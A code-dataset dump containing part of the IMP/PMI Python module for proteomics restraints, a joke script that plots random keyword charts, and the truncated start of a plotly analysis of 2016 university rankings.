c2 = tokens[1]
ps1 = IMP.atom.Selection(root_hier, resolution=resolution,
molecule=c1, residue_index=r1)
ps1 = ps1.get_selected_particles()
hrc1 = [p.get_name() for p in ps1]
def nosym_subset(ps):
return [p for p in ps if not IMP.pmi.Symmetric.get_is_setup(p)
or IMP.pmi.Symmetric(p).get_symmetric() == 0]
ps1nosym = nosym_subset(ps1)
hrc1nosym = [p.get_name() for p in ps1nosym]
if len(ps1) == 0:
warnings.warn(
"AmbiguousCompositeRestraint: residue %d of chain %s "
"is not there" % (r1, c1), IMP.pmi.StructureWarning)
continue
ps2 = IMP.atom.Selection(root_hier, resolution=resolution,
molecule=c2, residue_index=r2)
ps2 = ps2.get_selected_particles()
hrc2 = [p.get_name() for p in ps2]
ps2nosym = nosym_subset(ps2)
hrc2nosym = [p.get_name() for p in ps2nosym]
if len(ps2) == 0:
warnings.warn(
"AmbiguousCompositeRestraint: residue %d of chain %s "
"is not there" % (r2, c2), IMP.pmi.StructureWarning)
continue
cr = IMP.pmi.CompositeRestraint(
self.m, ps1nosym, self.cut_off, self.lam, True, self.plateau)
cr.add_composite_particle(ps2)
self.rs.add_restraint(cr)
self.pairs.append(
(ps1nosym,
hrc1nosym,
c1,
r1,
ps2,
hrc2,
c2,
r2,
cr))
cr = IMP.pmi.CompositeRestraint(
self.m, ps1, self.cut_off, self.lam, True, self.plateau)
cr.add_composite_particle(ps2nosym)
self.rs.add_restraint(cr)
self.pairs.append(
(ps1,
hrc1,
c1,
r1,
ps2nosym,
hrc2nosym,
c2,
r2,
cr))
def plot_restraint(
self,
maxdist=100,
npoints=100):
p1 = IMP.Particle(self.m)
p2 = IMP.Particle(self.m)
d1 = IMP.core.XYZR.setup_particle(p1)
d2 = IMP.core.XYZR.setup_particle(p2)
cr = IMP.pmi.CompositeRestraint(
self.m,
[p1],
self.cut_off,
self.lam,
True,
self.plateau)
cr.add_composite_particle([p2])
dists = []
scores = []
for i in range(npoints):
d2.set_coordinates(
IMP.algebra.Vector3D(maxdist / npoints * float(i), 0, 0))
dists.append(IMP.core.get_distance(d1, d2))
scores.append(cr.unprotected_evaluate(None))
IMP.pmi.output.plot_xy_data(dists, scores)
def set_label(self, label):
self.label = label
self.rs.set_name(label)
for r in self.rs.get_restraints():
r.set_name(label)
def add_to_model(self):
IMP.pmi.tools.add_restraint_to_model(self.m, self.rs)
def get_hierarchies(self):
return self.prot
def get_restraint_sets(self):
return self.rs
def get_restraint(self):
return self.rs
def set_output_level(self, level="low"):
# this might be "low" or "high"
self.outputlevel = level
def set_weight(self, weight):
self.weight = weight
self.rs.set_weight(weight)
def get_output(self):
# content of the cross-link database pairs
# self.pairs.append((p1,p2,dr,r1,c1,r2,c2))
output = {}
score = self.weight * self.rs.unprotected_evaluate(None)
output["_TotalScore"] = str(score)
output["AmbiguousCompositeRestraint_Score_" + self.label] = str(score)
for n, p in enumerate(self.pairs):
ps1 = p[0]
hrc1 = p[1]
c1 = p[2]
r1 = p[3]
ps2 = p[4]
hrc2 = p[5]
c2 = p[6]
r2 = p[7]
cr = p[8]
for n1, p1 in enumerate(ps1):
name1 = hrc1[n1]
for n2, p2 in enumerate(ps2):
name2 = hrc2[n2]
d1 = IMP.core.XYZR(p1)
d2 = IMP.core.XYZR(p2)
label = str(r1) + ":" + name1 + "_" + str(r2) + ":" + name2
output["AmbiguousCompositeRestraint_Distance_" +
label] = str(IMP.core.get_distance(d1, d2))
label = str(r1) + ":" + c1 + "_" + str(r2) + ":" + c2
output["AmbiguousCompositeRestraint_Score_" +
label] = str(self.weight * cr.unprotected_evaluate(None))
return output
#
class SimplifiedPEMAP(object):
def __init__(self, root_hier, restraints_file, expdistance, strength,
resolution=None):
self.m = root_hier.get_model()
self.rs = IMP.RestraintSet(self.m, 'data')
self.label = "None"
self.pairs = []
self.outputlevel = "low"
self.expdistance = expdistance
self.strength = strength
fl = IMP.pmi.tools.open_file_or_inline_text(restraints_file)
for line in fl:
tokens = line.split()
# skip character
if (tokens[0] == "#"):
continue
r1 = int(tokens[2])
c1 = tokens[0]
r2 = int(tokens[3])
c2 = tokens[1]
pcc = float(tokens[4])
ps1 = IMP.atom.Selection(root_hier, resolution=resolution,
molecule=c1, residue_index=r1,
copy_index=0)
ps1 = ps1.get_selected_particles()
if len(ps1) == 0:
warnings.warn(
"SimplifiedPEMAP: residue %d of chain %s is not there "
"(w/ %d %s)" % (r1, c1, r2, c2), IMP.pmi.StructureWarning)
continue
if len(ps1) > 1:
warnings.warn(
"SimplifiedPEMAP: residue %d of chain %s selected "
"multiple particles" % (r1, c1), IMP.pmi.StructureWarning)
continue
ps2 = IMP.atom.Selection(root_hier, resolution=resolution,
molecule=c2, residue_index=r2,
copy_index=0)
ps2 = ps2.get_selected_particles()
if len(ps2) == 0:
warnings.warn(
"SimplifiedPEMAP: residue %d of chain %s is not there "
"(w/ %d %s)" % (r1, c1, r2, c2), IMP.pmi.StructureWarning)
continue
if len(ps2) > 1:
warnings.warn(
"SimplifiedPEMAP: residue %d of chain %s selected "
"multiple particles" % (r2, c2), IMP.pmi.StructureWarning)
continue
p1 = ps1[0]
p2 = ps2[0]
# This is harmonic potential for the pE-MAP data
upperdist = self.get_upper_bond(pcc)
limit = 0.5 * self.strength * 15.0 ** 2 + 10.0
hub = IMP.core.TruncatedHarmonicUpperBound(
upperdist, self.strength, 15, limit)
# This is harmonic for the X-link
df = IMP.core.SphereDistancePairScore(hub)
dr = IMP.core.PairRestraint(self.m, df, (p1, p2))
self.rs.add_restraint(dr)
self.pairs.append((p1, p2, dr, r1, c1, r2, c2))
# Lower-bound restraint
lowerdist = self.get_lower_bond(pcc)
limit = 0.5 * self.strength * 15.0 ** 2 + 10.0
hub2 = IMP.core.TruncatedHarmonicLowerBound(
lowerdist, self.strength, 15, limit)
# This is harmonic for the X-link
df2 = IMP.core.SphereDistancePairScore(hub2)
dr2 = IMP.core.PairRestraint(self.m, df2, (p1, p2))
self.rs.add_restraint(dr2)
self.pairs.append((p1, p2, dr2, r1, c1, r2, c2))
def get_upper_bond(self, pearsoncc):
# return (pearsoncc-1.)/-0.0075
return (pearsoncc - .5) / (-0.005415)
def get_lower_bond(self, pearsoncc):
return (pearsoncc - 1.) / -0.0551
def set_label(self, label):
self.label = label
def add_to_model(self):
IMP.pmi.tools.add_restraint_to_model(self.m, self.rs)
def get_hierarchies(self):
return self.prot
def get_restraint_sets(self):
return self.rs
def set_output_level(self, level="low"):
# this might be "low" or "high"
self.outputlevel = level
def get_output(self):
# content of the cross-link database pairs
# self.pairs.append((p1,p2,dr,r1,c1,r2,c2))
output = {}
score = self.rs.unprotected_evaluate(None)
output["_TotalScore"] = str(score)
output["SimplifiedPEMAP_Score_" + self.label] = str(score)
for i in range(len(self.pairs)):
p0 = self.pairs[i][0]
p1 = self.pairs[i][1]
crosslinker = 'standard'
ln = self.pairs[i][2]
resid1 = self.pairs[i][3]
chain1 = self.pairs[i][4]
resid2 = self.pairs[i][5]
chain2 = self.pairs[i][6]
label = str(resid1) + ":" + chain1 + "_" + \
str(resid2) + ":" + chain2
output["SimplifiedPEMAP_Score_" + crosslinker + "_" +
label] = str(ln.unprotected_evaluate(None))
d0 = IMP.core.XYZ(p0)
d1 = IMP.core.XYZ(p1)
output["SimplifiedPEMAP_Distance_" +
label] = str(IMP.core.get_distance(d0, d1))
return output
class SetupConnectivityNetworkRestraint(object):
'''
generates and wraps a IMP.pmi.ConnectivityRestraint between domains
example:
cr=restraints.ConnectivityNetworkRestraint(
simo,["CCC",(1,100,"TTT"),(100,150,"AAA")])
cr.add_to_model()
cr.set_label("CR1")
Multistate support =No
Selection type=selection tuple
Resolution=Yes
'''
def __init__(self, objects, kappa=10.0, resolution=1.0, label="None"):
self.weight = 1.0
self.kappa = kappa
self.label = label
if self.label == "None":
self.label = str(selection_tuples) # noqa: F821
hiers = []
for obj in objects:
hiers.append(IMP.pmi.tools.input_adaptor(
obj, resolution, flatten=True))
self.m = hiers[0][0].get_model()
cr = ConnectivityNetworkRestraint(self.m)
for hs in hiers:
cr.add_particles([h.get_particle() for h in hs])
self.rs = IMP.RestraintSet(self.m, label)
self.rs.add_restraint(cr)
def set_label(self, label):
self.label = label
self.rs.set_name(label)
for r in self.rs.get_restraints():
r.set_name(label)
def add_to_model(self):
IMP.pmi.tools.add_restraint_to_model(self.m, self.rs)
def get_restraint(self):
return self.rs
def get_restraints(self):
rlist = []
for r in self.rs.get_restraints():
rlist.append(IMP.core.PairRestraint.get_from(r))
return rlist
def set_weight(self, weight):
self.weight = weight
self.rs.set_weight(weight)
def get_output(self):
output = {}
score = self.weight * self.rs.unprotected_evaluate(None)
output["_TotalScore"] = str(score)
output["ConnectivityNetworkRestraint_" + self.label] = str(score)
return output
class ConnectivityNetworkRestraint(IMP.Restraint):
'''
a python restraint that computes the score for a composite of proteins
Authors: G. Bouvier, R. Pellarin. Pasteur Institute.
'''
def __init__(self, m, slope=1.0, theta=0.0, plateau=0.0000000001,
linear_slope=0.015):
'''
input a list of particles, the slope and theta of the sigmoid potential
theta is the cutoff distance for a protein-protein contact
'''
# Import networkx here so that we don't introduce it as a dependency
# for *every* proteomics restraint, only this one
import networkx
self.networkx = networkx
IMP.Restraint.__init__(self, m, "ConnectivityNetworkRestraint %1%")
self.slope = slope
self.theta = theta
self.linear_slope = linear_slope
self.plateau = plateau
self.particles_blocks = []
self.particle_list = []
def get_number_of_particle_blocks(self):
return len(self.particles_blocks)
def get_number_of_particles_for_block(self, block_index):
return len(self.particles_blocks[block_index])
def add_particles(self, particles):
self.particles_blocks.append(particles)
self.particle_list += particles
def get_full_graph(self):
'''
get the full graph of distances between every particle pair
'''
import scipy.spatial
pdist_array = numpy.array(
IMP.pmi.get_list_of_bipartite_minimum_sphere_distance(
self.particles_blocks))
pdist_mat = scipy.spatial.distance.squareform(pdist_array)
pdist_mat[pdist_mat < 0] = 0
graph = self.networkx.Graph(pdist_mat)
return graph
def get_minimum_spanning_tree(self):
"""
return the minimum spanning tree
"""
graph = self.get_full_graph()
graph = self.networkx.minimum_spanning_tree(graph)
return graph
def sigmoid(self, x):
'''
a sigmoid function that scores the probability of a contact
between two proteins
'''
# return 1 - (x)**self.slope/ float(((x)**self.slope +
# self.theta**self.slope))
argvalue = (x - self.theta) / self.slope
return 1.0 - (1.0 - self.plateau) / (1.0 + math.exp(-argvalue))
def unprotected_evaluate(self, da):
graph = self.get_minimum_spanning_tree()
score = 0.0
for e in graph.edges():
dist = graph.get_edge_data(*e)['weight']
prob = self.sigmoid(dist)
score += -numpy.log(prob)
score += self.linear_slope * dist
return score
def do_get_inputs(self):
return self.particle_list
class FuzzyBoolean(object):
'''
Fully Ambiguous Restraint that can be built using boolean logic
R. Pellarin. Pasteur Institute.
'''
def __init__(self, p1, operator=None, p2=None):
'''
input a list of particles, the slope and theta of the sigmoid potential
theta is the cutoff distance for a protein-protein contact
'''
if isinstance(p1, FuzzyBoolean) and isinstance(p2, FuzzyBoolean):
self.operations = [p1, operator, p2]
self.value = None
else:
self.operations = []
self.value = p1
def __or__(self, FuzzyBoolean2):
return FuzzyBoolean(self, self.or_, FuzzyBoolean2)
def __and__(self, FuzzyBoolean2):
return FuzzyBoolean(self, self.and_, FuzzyBoolean2)
def and_(self, a, b):
return a * b
def or_(self, a, b):
return 1.0 - (1.0 - a) * (1.0 - b)
def evaluate(self):
if len(self.operations) == 0:
return self.value
FuzzyBoolean1, op, FuzzyBoolean2 = self.operations
return op(FuzzyBoolean1.evaluate(), FuzzyBoolean2.evaluate())
class FuzzyRestraint(IMP.Restraint):
'''
Fully Ambiguous Restraint that can be built using boolean logic
R. Pellarin. Pasteur Institute.
'''
plateau = 0.00000000000001
theta = 5.0
slope = 2.0
innerslope = 0.01
def __init__(self, m, p1, p2, operator=None):
'''
input a list of particles, the slope and theta of the sigmoid potential
theta is the cutoff distance for a protein-protein contact
'''
IMP.Restraint.__init__(self, m, "FuzzyRestraint %1%")
self.m = m
self.min = sys.float_info.min
if isinstance(p1, FuzzyRestraint) and isinstance(p2, FuzzyRestraint):
self.operations = [p1, operator, p2]
self.particle_pair = None
elif isinstance(p1, FuzzyRestraint) and p2 is None:
self.operations = [p1, operator, None]
self.particle_pair = None
else:
self.operations = []
self.particle_pair = (p1, p2)
def __or__(self, FuzzyRestraint2):
return FuzzyRestraint(self.m, self, FuzzyRestraint2, self.or_)
def __and__(self, FuzzyRestraint2):
return FuzzyRestraint(self.m, self, FuzzyRestraint2, self.and_)
def __invert__(self):
return FuzzyRestraint(self.m, self, None, self.invert_)
def and_(self, a, b):
c = a + b
return c
def or_(self, a, b):
c = math.exp(-a) + math.exp(-b) - math.exp(-a - b)
return -math.log(c)
def invert_(self, a):
c = 1.0 - math.exp(-a)
return -math.log(c)
def evaluate(self):
if len(self.operations) == 0:
return self.distance()
FuzzyRestraint1, op, FuzzyRestraint2 = self.operations
if FuzzyRestraint2 is not None:
return op(FuzzyRestraint1.evaluate(), FuzzyRestraint2.evaluate())
else:
return op(FuzzyRestraint1.evaluate())
def distance(self):
d1 = IMP.core.XYZ(self.particle_pair[0])
d2 = IMP.core.XYZ(self.particle_pair[1])
d = IMP.core.get_distance(d1, d2)
argvalue = (d-self.theta)/self.slope
return (-math.log(1.0 - (1.0-self.plateau) / (1.0+math.exp(-argvalue)))
+ self.innerslope*d)
def add_to_model(self):
IMP.pmi.tools.add_restraint_to_model(self.m, self)
def unprotected_evaluate(self, da):
return self.evaluate()
def __str__(self):
if len(self.operations) == 0:
return str(self.particle_pair)
FuzzyRestraint1, op, FuzzyRestraint2 = self.operations
if FuzzyRestraint2 is not None:
return str(FuzzyRestraint1) + str(op) + str(FuzzyRestraint2)
else:
return str(FuzzyRestraint1) + str(op)
def do_get_inputs(self):
if len(self.operations) == 0:
return list(self.particle_pair)
FuzzyRestraint1, op, FuzzyRestraint2 = self.operations
if FuzzyRestraint2 is not None:
return list(set(FuzzyRestraint1.do_get_inputs()
+ FuzzyRestraint2.do_get_inputs()))
else:
return list(set(FuzzyRestraint1.do_get_inputs()))
|
salilab/pmi
|
pyext/src/restraints/proteomics.py
|
proteomics.py
|
py
| 23,746 |
python
|
en
|
code
| 12 |
github-code
|
6
|
[
{
"api_name": "IMP.atom.create_connectivity_restraint",
"line_number": 41,
"usage_type": "call"
},
{
"api_name": "IMP.atom",
"line_number": 41,
"usage_type": "attribute"
},
{
"api_name": "IMP.RestraintSet",
"line_number": 44,
"usage_type": "call"
},
{
"api_name": "IMP.pmi.tools.add_restraint_to_model",
"line_number": 54,
"usage_type": "call"
},
{
"api_name": "IMP.pmi",
"line_number": 54,
"usage_type": "attribute"
},
{
"api_name": "IMP.core.PairRestraint.get_from",
"line_number": 62,
"usage_type": "call"
},
{
"api_name": "IMP.core",
"line_number": 62,
"usage_type": "attribute"
},
{
"api_name": "IMP.pmi.tools.input_adaptor",
"line_number": 91,
"usage_type": "call"
},
{
"api_name": "IMP.pmi",
"line_number": 91,
"usage_type": "attribute"
},
{
"api_name": "IMP.RestraintSet",
"line_number": 95,
"usage_type": "call"
},
{
"api_name": "IMP.pmi.tools.input_adaptor",
"line_number": 100,
"usage_type": "call"
},
{
"api_name": "IMP.pmi",
"line_number": 100,
"usage_type": "attribute"
},
{
"api_name": "IMP.pmi.CompositeRestraint",
"line_number": 105,
"usage_type": "call"
},
{
"api_name": "IMP.pmi",
"line_number": 105,
"usage_type": "attribute"
},
{
"api_name": "IMP.pmi.tools.add_restraint_to_model",
"line_number": 127,
"usage_type": "call"
},
{
"api_name": "IMP.pmi",
"line_number": 127,
"usage_type": "attribute"
},
{
"api_name": "IMP.RestraintSet",
"line_number": 150,
"usage_type": "call"
},
{
"api_name": "IMP.pmi.tools.open_file_or_inline_text",
"line_number": 159,
"usage_type": "call"
},
{
"api_name": "IMP.pmi",
"line_number": 159,
"usage_type": "attribute"
},
{
"api_name": "IMP.atom.Selection",
"line_number": 172,
"usage_type": "call"
},
{
"api_name": "IMP.atom",
"line_number": 172,
"usage_type": "attribute"
},
{
"api_name": "IMP.pmi.Symmetric.get_is_setup",
"line_number": 178,
"usage_type": "call"
},
{
"api_name": "IMP.pmi",
"line_number": 178,
"usage_type": "attribute"
},
{
"api_name": "IMP.pmi.Symmetric",
"line_number": 179,
"usage_type": "call"
},
{
"api_name": "IMP.pmi",
"line_number": 179,
"usage_type": "attribute"
},
{
"api_name": "warnings.warn",
"line_number": 184,
"usage_type": "call"
},
{
"api_name": "IMP.pmi",
"line_number": 186,
"usage_type": "attribute"
},
{
"api_name": "IMP.atom.Selection",
"line_number": 189,
"usage_type": "call"
},
{
"api_name": "IMP.atom",
"line_number": 189,
"usage_type": "attribute"
},
{
"api_name": "warnings.warn",
"line_number": 197,
"usage_type": "call"
},
{
"api_name": "IMP.pmi",
"line_number": 199,
"usage_type": "attribute"
},
{
"api_name": "IMP.pmi.CompositeRestraint",
"line_number": 202,
"usage_type": "call"
},
{
"api_name": "IMP.pmi",
"line_number": 202,
"usage_type": "attribute"
},
{
"api_name": "IMP.pmi.CompositeRestraint",
"line_number": 218,
"usage_type": "call"
},
{
"api_name": "IMP.pmi",
"line_number": 218,
"usage_type": "attribute"
},
{
"api_name": "IMP.Particle",
"line_number": 239,
"usage_type": "call"
},
{
"api_name": "IMP.Particle",
"line_number": 240,
"usage_type": "call"
},
{
"api_name": "IMP.core.XYZR.setup_particle",
"line_number": 241,
"usage_type": "call"
},
{
"api_name": "IMP.core",
"line_number": 241,
"usage_type": "attribute"
},
{
"api_name": "IMP.core.XYZR.setup_particle",
"line_number": 242,
"usage_type": "call"
},
{
"api_name": "IMP.core",
"line_number": 242,
"usage_type": "attribute"
},
{
"api_name": "IMP.pmi.CompositeRestraint",
"line_number": 243,
"usage_type": "call"
},
{
"api_name": "IMP.pmi",
"line_number": 243,
"usage_type": "attribute"
},
{
"api_name": "IMP.algebra.Vector3D",
"line_number": 255,
"usage_type": "call"
},
{
"api_name": "IMP.algebra",
"line_number": 255,
"usage_type": "attribute"
},
{
"api_name": "IMP.core.get_distance",
"line_number": 256,
"usage_type": "call"
},
{
"api_name": "IMP.core",
"line_number": 256,
"usage_type": "attribute"
},
{
"api_name": "IMP.pmi.output.plot_xy_data",
"line_number": 258,
"usage_type": "call"
},
{
"api_name": "IMP.pmi",
"line_number": 258,
"usage_type": "attribute"
},
{
"api_name": "IMP.pmi.tools.add_restraint_to_model",
"line_number": 267,
"usage_type": "call"
},
{
"api_name": "IMP.pmi",
"line_number": 267,
"usage_type": "attribute"
},
{
"api_name": "IMP.core.XYZR",
"line_number": 309,
"usage_type": "call"
},
{
"api_name": "IMP.core",
"line_number": 309,
"usage_type": "attribute"
},
{
"api_name": "IMP.core.XYZR",
"line_number": 310,
"usage_type": "call"
},
{
"api_name": "IMP.core",
"line_number": 310,
"usage_type": "attribute"
},
{
"api_name": "IMP.core.get_distance",
"line_number": 313,
"usage_type": "call"
},
{
"api_name": "IMP.core",
"line_number": 313,
"usage_type": "attribute"
},
{
"api_name": "IMP.RestraintSet",
"line_number": 328,
"usage_type": "call"
},
{
"api_name": "IMP.pmi.tools.open_file_or_inline_text",
"line_number": 336,
"usage_type": "call"
},
{
"api_name": "IMP.pmi",
"line_number": 336,
"usage_type": "attribute"
},
{
"api_name": "IMP.atom.Selection",
"line_number": 350,
"usage_type": "call"
},
{
"api_name": "IMP.atom",
"line_number": 350,
"usage_type": "attribute"
},
{
"api_name": "warnings.warn",
"line_number": 355,
"usage_type": "call"
},
{
"api_name": "IMP.pmi",
"line_number": 357,
"usage_type": "attribute"
},
{
"api_name": "warnings.warn",
"line_number": 360,
"usage_type": "call"
},
{
"api_name": "IMP.pmi",
"line_number": 362,
"usage_type": "attribute"
},
{
"api_name": "IMP.atom.Selection",
"line_number": 365,
"usage_type": "call"
},
{
"api_name": "IMP.atom",
"line_number": 365,
"usage_type": "attribute"
},
{
"api_name": "warnings.warn",
"line_number": 370,
"usage_type": "call"
},
{
"api_name": "IMP.pmi",
"line_number": 372,
"usage_type": "attribute"
},
{
"api_name": "warnings.warn",
"line_number": 375,
"usage_type": "call"
},
{
"api_name": "IMP.pmi",
"line_number": 377,
"usage_type": "attribute"
},
{
"api_name": "IMP.core.TruncatedHarmonicUpperBound",
"line_number": 386,
"usage_type": "call"
},
{
"api_name": "IMP.core",
"line_number": 386,
"usage_type": "attribute"
},
{
"api_name": "IMP.core.SphereDistancePairScore",
"line_number": 390,
"usage_type": "call"
},
{
"api_name": "IMP.core",
"line_number": 390,
"usage_type": "attribute"
},
{
"api_name": "IMP.core.PairRestraint",
"line_number": 391,
"usage_type": "call"
},
{
"api_name": "IMP.core",
"line_number": 391,
"usage_type": "attribute"
},
{
"api_name": "IMP.core.TruncatedHarmonicLowerBound",
"line_number": 398,
"usage_type": "call"
},
{
"api_name": "IMP.core",
"line_number": 398,
"usage_type": "attribute"
},
{
"api_name": "IMP.core.SphereDistancePairScore",
"line_number": 402,
"usage_type": "call"
},
{
"api_name": "IMP.core",
"line_number": 402,
"usage_type": "attribute"
},
{
"api_name": "IMP.core.PairRestraint",
"line_number": 403,
"usage_type": "call"
},
{
"api_name": "IMP.core",
"line_number": 403,
"usage_type": "attribute"
},
{
"api_name": "IMP.pmi.tools.add_restraint_to_model",
"line_number": 418,
"usage_type": "call"
},
{
"api_name": "IMP.pmi",
"line_number": 418,
"usage_type": "attribute"
},
{
"api_name": "IMP.core.XYZ",
"line_number": 453,
"usage_type": "call"
},
{
"api_name": "IMP.core",
"line_number": 453,
"usage_type": "attribute"
},
{
"api_name": "IMP.core.XYZ",
"line_number": 454,
"usage_type": "call"
},
{
"api_name": "IMP.core",
"line_number": 454,
"usage_type": "attribute"
},
{
"api_name": "IMP.core.get_distance",
"line_number": 456,
"usage_type": "call"
},
{
"api_name": "IMP.core",
"line_number": 456,
"usage_type": "attribute"
},
{
"api_name": "IMP.pmi.tools.input_adaptor",
"line_number": 487,
"usage_type": "call"
},
{
"api_name": "IMP.pmi",
"line_number": 487,
"usage_type": "attribute"
},
{
"api_name": "IMP.RestraintSet",
"line_number": 494,
"usage_type": "call"
},
{
"api_name": "IMP.pmi.tools.add_restraint_to_model",
"line_number": 504,
"usage_type": "call"
},
{
"api_name": "IMP.pmi",
"line_number": 504,
"usage_type": "attribute"
},
{
"api_name": "IMP.core.PairRestraint.get_from",
"line_number": 512,
"usage_type": "call"
},
{
"api_name": "IMP.core",
"line_number": 512,
"usage_type": "attribute"
},
{
"api_name": "IMP.Restraint",
"line_number": 527,
"usage_type": "attribute"
},
{
"api_name": "IMP.Restraint.__init__",
"line_number": 544,
"usage_type": "call"
},
{
"api_name": "IMP.Restraint",
"line_number": 544,
"usage_type": "attribute"
},
{
"api_name": "numpy.array",
"line_number": 567,
"usage_type": "call"
},
{
"api_name": "IMP.pmi.get_list_of_bipartite_minimum_sphere_distance",
"line_number": 568,
"usage_type": "call"
},
{
"api_name": "IMP.pmi",
"line_number": 568,
"usage_type": "attribute"
},
{
"api_name": "scipy.spatial.spatial.distance.squareform",
"line_number": 570,
"usage_type": "call"
},
{
"api_name": "scipy.spatial.spatial",
"line_number": 570,
"usage_type": "attribute"
},
{
"api_name": "scipy.spatial",
"line_number": 570,
"usage_type": "name"
},
{
"api_name": "math.exp",
"line_number": 591,
"usage_type": "call"
},
{
"api_name": "numpy.log",
"line_number": 599,
"usage_type": "call"
},
{
"api_name": "IMP.Restraint",
"line_number": 647,
"usage_type": "attribute"
},
{
"api_name": "IMP.Restraint.__init__",
"line_number": 663,
"usage_type": "call"
},
{
"api_name": "IMP.Restraint",
"line_number": 663,
"usage_type": "attribute"
},
{
"api_name": "sys.float_info",
"line_number": 665,
"usage_type": "attribute"
},
{
"api_name": "math.exp",
"line_number": 690,
"usage_type": "call"
},
{
"api_name": "math.log",
"line_number": 691,
"usage_type": "call"
},
{
"api_name": "math.exp",
"line_number": 694,
"usage_type": "call"
},
{
"api_name": "math.log",
"line_number": 695,
"usage_type": "call"
},
{
"api_name": "IMP.core.XYZ",
"line_number": 708,
"usage_type": "call"
},
{
"api_name": "IMP.core",
"line_number": 708,
"usage_type": "attribute"
},
{
"api_name": "IMP.core.XYZ",
"line_number": 709,
"usage_type": "call"
},
{
"api_name": "IMP.core",
"line_number": 709,
"usage_type": "attribute"
},
{
"api_name": "IMP.core.get_distance",
"line_number": 710,
"usage_type": "call"
},
{
"api_name": "IMP.core",
"line_number": 710,
"usage_type": "attribute"
},
{
"api_name": "math.log",
"line_number": 712,
"usage_type": "call"
},
{
"api_name": "math.exp",
"line_number": 712,
"usage_type": "call"
},
{
"api_name": "IMP.pmi.tools.add_restraint_to_model",
"line_number": 716,
"usage_type": "call"
},
{
"api_name": "IMP.pmi",
"line_number": 716,
"usage_type": "attribute"
}
] |
3962586718
|
import sys
import os
import random
import matplotlib.pyplot as plt
from typing import List
BASE_FILENAME="develop"
OUTPUT_TYPE="png"
def create_pie_chart(keywords: List[str], base_filename: str, output_type: str):
data = []
explode = []
biggest_value = 0
biggest_iterator = 0
for i, _ in enumerate(keywords):
random_value = random.randint(10, 100)
data.append(random_value)
explode.append(0)
if random_value >= biggest_value:
biggest_iterator = i
biggest_value = random_value
explode[biggest_iterator] = 0.1
fig1, ax1 = plt.subplots()
ax1.set_xlabel("Distribution of value")
ax1.pie(data, explode=explode, labels=keywords, autopct='%1.1f%%',
shadow=True, startangle=90)
ax1.axis('equal') # Equal aspect ratio ensures that pie is drawn as a circle.
plt.savefig(f"outputs/{base_filename}_pie.{output_type}")
def create_bar_chart(keywords: List[str], base_filename: str, output_type: str):
data = []
for _ in keywords:
data.append(random.randint(5, 40))
plt.xlabel('Option')
plt.ylabel('Annual savings in percent')
plt.bar(keywords, data)
plt.savefig(f"outputs/{base_filename}_bar.{output_type}")
def main():
keywords = []
for i, element in enumerate(sys.argv):
if i == 0:
continue
keywords.append(element)
print(f"Your important {len(keywords)} keywords are: {keywords}")
create_bar_chart(keywords, BASE_FILENAME, OUTPUT_TYPE)
create_pie_chart(keywords, BASE_FILENAME, OUTPUT_TYPE)
print("Your important graphs were created")
if __name__=="__main__":
main()
|
neilschark/bullshitgraphs
|
bullshitgraphs/bullshitgraphs.py
|
bullshitgraphs.py
|
py
| 1,675 |
python
|
en
|
code
| 1 |
github-code
|
6
|
[
{
"api_name": "typing.List",
"line_number": 10,
"usage_type": "name"
},
{
"api_name": "random.randint",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot.subplots",
"line_number": 27,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 27,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplot.savefig",
"line_number": 33,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 33,
"usage_type": "name"
},
{
"api_name": "typing.List",
"line_number": 35,
"usage_type": "name"
},
{
"api_name": "random.randint",
"line_number": 39,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot.xlabel",
"line_number": 41,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 41,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplot.ylabel",
"line_number": 42,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 42,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplot.bar",
"line_number": 44,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 44,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplot.savefig",
"line_number": 45,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 45,
"usage_type": "name"
},
{
"api_name": "sys.argv",
"line_number": 50,
"usage_type": "attribute"
}
] |
42440314481
|
import plotly.express as px
import plotly.graph_objs as go
import pandas as pd
from sklearn.decomposition import PCA
import numpy as np
#****************** Récupération des données CSV ************************#
df = pd.read_csv("https://simplonline-v3-prod.s3.eu-west-3.amazonaws.com/media/file/csv/be67fa74-2c34-419c-9249-050394a7eb3e.csv")
# df2016 = df[df.year == 2016].iloc[:50,:]
# df2016['world_rank'] = df2016['world_rank'].replace(['=39'],'39')
# df2016['world_rank'] = df2016['world_rank'].replace(['=44'],'44')
# df2016['world_rank'] = df2016['world_rank'].replace(['=47'],'47')
# df2016["num_students"] = [str(each).replace(',', '') for each in df2016["num_students"]]
df2016 = df[df.year == 2016].iloc[:58,:] # 8lines contains "NaN"
df2016
df2016 = df2016.dropna()
df2016.isnull().sum()
print(len(df2016))
df2016
def convertGender (x):
a, b= x.split(':')
c = format(int(a)/int(b), ".2f")
return c
df2016['female_male_ratio'] = df2016['female_male_ratio'].apply(convertGender)
df2016.world_rank = [int(each.replace('=','')) for each in df2016.world_rank]
df2016['international_students'] = df2016['international_students'].str.replace(r'%', r'.0').astype('float') / 100.0
df2016['num_students'] = df2016['num_students'].str.replace(r',', r'.').astype('float')
df2016['income'] = df2016['income'].astype('float')
df2016['international'] = df2016['international'].astype('float')
df2016['total_score'] = df2016['total_score'].astype('float')
df_2016 = df2016.drop(['year', 'university_name','country'], axis=1)
#nombre d'observations
n = df_2016.shape[0]
#nombre de variables
p = df_2016.shape[1]
# figure1
fig1 = px.scatter(df2016, x="country", y="world_rank", color="country")
fig1.update_layout(clickmode='event+select')
fig1.update_traces(marker_size=20)
# figure2
trace1 = go.Scatter( x = df2016.world_rank,y = df2016.citations,
mode = "lines", name = "citations",marker = dict(color = 'rgba(16, 112, 2, 0.8)'),text = df.university_name)
trace2 = go.Scatter( x = df2016.world_rank,y = df2016.teaching,
mode = "lines+markers",name = "enseignement",marker = dict(color = 'rgba(80, 26, 80, 0.8)'),text = df.university_name)
data = [trace1, trace2]
layout = dict(title = 'Citation et enseignement comparé au classement mondial des 50 meilleures universités en 2016',
